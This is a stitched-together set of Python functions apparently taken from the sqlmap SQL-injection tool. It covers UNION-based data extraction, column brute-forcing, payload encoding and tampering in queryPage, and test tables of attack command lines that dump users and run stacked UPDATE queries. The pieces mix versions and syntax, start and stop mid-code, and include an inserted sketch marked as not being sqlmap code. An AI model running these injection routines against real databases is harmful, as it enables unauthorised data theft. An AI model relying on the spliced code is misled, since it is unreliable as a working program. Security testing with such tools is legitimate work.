UNION query (NULL) - 3 columns", "the back-end DBMS is PostgreSQL", "appears to have 3 columns", "current user is DBA: False", ": 'foobar'")), ("-u 'http://testbed/postgresql/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: PostgreSQL AND error-based", "Title: PostgreSQL > 8.1 stacked queries", "Title: PostgreSQL > 8.1 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "x86_64-pc-linux-gnu", "current database (equivalent to schema on PostgreSQL): 'public'", "current user: '******'", "[1 column]", "| surname | varchar |")), ) retVal = True count = 0 for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) cmd = "%s %s %s --batch" % (sys.executable, os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options) output = shellExec(cmd) if not all( (check in output if not check.startswith('~') else check[1:] not in output) for check in checks): for check in checks: if check not in output: print(cmd, check) dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % clearColors(output)) retVal = False count += 1 clearConsoleLine() if retVal: logger.info("bed test final result: PASSED") else: logger.error("best test final result: FAILED") return retVal
def unionUse(expression, unpack=True, dump=False): """ This function tests for an UNION SQL injection on the target URL then call its subsidiary function to effectively perform an UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if conf.api else None if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL) and expressionFields and not conf.binaryFields: match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I) if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression): kb.jsonAggMode = True if Backend.isDbms(DBMS.MYSQL): query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1) elif Backend.isDbms(DBMS.ORACLE): query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1) elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) elif Backend.isDbms(DBMS.MSSQL): query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop) output = _oneShotUnionUse(query, False) value = parseUnionPage(output) kb.jsonAggMode = False # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = 
countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) debugMsg = "used SQL query returns " debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.debug(debugMsg) elif count and (not isinstance(count, six.string_types) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value if isNumPosStrValue(count) and int(count) > 1: threadData = getCurrentThreadData() try: threadData.shared.limits = iter(xrange(startLimit, stopLimit)) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. 
It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: threadData.shared.counter += 1 num = next(threadData.shared.limits) except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: with kb.locks.value: if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): items = parseUnionPage(output) if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] items = [_ for _ in flattenValue(items)] if len(items) > len(expressionFieldsList): filtered = OrderedDict() for item in items: key = re.sub(r"[^A-Za-z0-9]", "", item).lower() if key not in filtered or re.search(r"[^A-Za-z0-9]", item): filtered[key] = item items = list(six.itervalues(filtered)) items = [items] index = None for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) else: index = None if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode: _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items])) status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\n" % status) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. 
sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else "ies", duration) logger.debug(debugMsg) return value
def columnExists(columnFile, regex=None): if not conf.tbl: errMsg = "missing table parameter" raise sqlmapMissingMandatoryOptionException, errMsg result = inject.checkBooleanExpression( safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise sqlmapDataException, errMsg infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(__addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db: table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.outputs = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming( columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression( safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.outputs.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % ( time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % ( threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit), '%') dataToStdout( "\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.outputs: result = inject.checkBooleanExpression("%s" % safeStringFormat( "EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = 'numeric' else: columns[column] = 'non-numeric' kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
def smokeTest(): """ Runs the basic smoke testing of a program """ dirtyPatchRandom() retVal = True count, length = 0, 0 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception as ex: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) logger.error(errMsg) else: logger.setLevel(logging.CRITICAL) kb.smokeMode = True (failure_count, _) = doctest.testmod(module) kb.smokeMode = False logger.setLevel(logging.INFO) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) def _(node): for __ in dir(node): if not __.startswith('_'): candidate = getattr(node, __) if isinstance(candidate, str): if '\\' in candidate: try: re.compile(candidate) except: errMsg = "smoke test failed at compiling '%s'" % candidate logger.error(errMsg) raise else: _(candidate) for dbms in queries: try: _(queries[dbms]) except: retVal = False clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal
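# --- Illustrative sketch (not sqlmap code): the import-and-doctest loop behind smokeTest() ---
# Every module under a package root is imported and its doctests executed; any import error or
# doctest failure fails the smoke test. The package name below is a placeholder.
import doctest
import importlib
import pkgutil

def smoke(package_name="lib"):
    ok = True
    package = importlib.import_module(package_name)
    for info in pkgutil.walk_packages(package.__path__, prefix=package_name + "."):
        try:
            module = importlib.import_module(info.name)
        except Exception:
            ok = False
            continue
        failed, _ = doctest.testmod(module)
        ok = ok and failed == 0
    return ok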
def queryPage( value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, ): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET if not auxHeaders: auxHeaders = {} raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = dict(conf.httpHeaders) contentType = max( headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys() ) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace(">", "&gt;").replace("<", "&lt;") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded if ( place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode ): payload = urlencode(payload, "%", False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(" "), " "): if splitter in payload: prefix, suffix = ( ("*/", "/*") if splitter == " " else (urlencode(_) for _ in ("*/", "/*")) ) parts = payload.split(splitter)
parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1], ) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix, ) payload = "".join(parts) for splitter in (urlencode(","), ","): payload = payload.replace( splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")) ) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = ( conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value ) post = post.replace(ASTERISK_MARKER, "*") if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: auxHeaders[value.split(",")[0]] = value.split(",", 1)[1] if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString, ) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post if not kb.postHint else None)): for part in item.split(delimiter): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) if cookie: for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False value = unicode(value) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter)) 
if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) if re.search(regex, (post or "")): found = True post = re.sub(regex, "\g<1>%s\g<3>" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ) if re.search(regex, (cookie or "")): found = True cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) if not found: if post is not None: post += "%s%s=%s" % (delimiter, name, value) elif get is not None: get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout(".") dataToStdout("\n") elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter " warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "errors " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. 
" warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage( url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host ) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ), ) if headers: if ( kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers ): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find("/") + 1 :] ) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare, ) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True, ) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return ( comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength), ) else: return comparison(page, headers, code, getRatioValue, pageLength)
def vulnTest(): """ Runs the testing against 'vulnserver' """ TESTS = ( (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'",)), (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape", (u": '\u0161u\u0107uraj'",)), ("--list-tampers", ("between", "MySQL", "xforwardedfor")), ("-r <request> --flush-session -v 5", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar")), ("-l <log> --flush-session --skip-waf -v 3 --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell")), ("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), ("-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), ("-u <url> --flush-session --data='{\"id\": 1}' --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <url> --flush-session -H 'Foo: Bar' -H 'Sna: Fu' --data='<root><param name=\"id\" value=\"1*\"/></root>' --union-char=1 --mobile --answers='smartphone=3' --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")), ("-u <url> --flush-session --method=PUT --data='a=1&b=2&c=3&id=1' --skip-static --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "2 entries")), ("-u <url> --flush-session -H 'id: 1*' --tables", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --banner --invalid-logical --technique=B --test-filter='OR boolean' --tamper=space2dash", ("banner: '3.", " LIKE ")), ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner", ("NULL connection is supported with HEAD method", "banner: '3.")), ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --answer=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary")), ("-u <url> --flush-session --all", ("5 entries", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")), ("-u '<url>&echo=foobar*' 
--flush-session", ("might be vulnerable to cross-site scripting",)), ("-u '<url>&query=*' --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d <direct> --flush-session --dump -T users --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)",)), ("-d <direct> --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "[*] 987654321",)), ) retVal = True count = 0 address, port = "127.0.0.10", random.randint(1025, 65535) def _thread(): vulnserver.init(quiet=True) vulnserver.run(address=address, port=port) thread = threading.Thread(target=_thread) thread.daemon = True thread.start() while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((address, port)) break except: time.sleep(1) handle, database = tempfile.mkstemp(suffix=".sqlite") os.close(handle) with sqlite3.connect(database) as conn: c = conn.cursor() c.executescript(vulnserver.SCHEMA) handle, request = tempfile.mkstemp(suffix=".req") os.close(handle) handle, log = tempfile.mkstemp(suffix=".log") os.close(handle) content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) open(request, "w+").write(content) open(log, "w+").write('<port>%d</port><request base64="true"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False))) 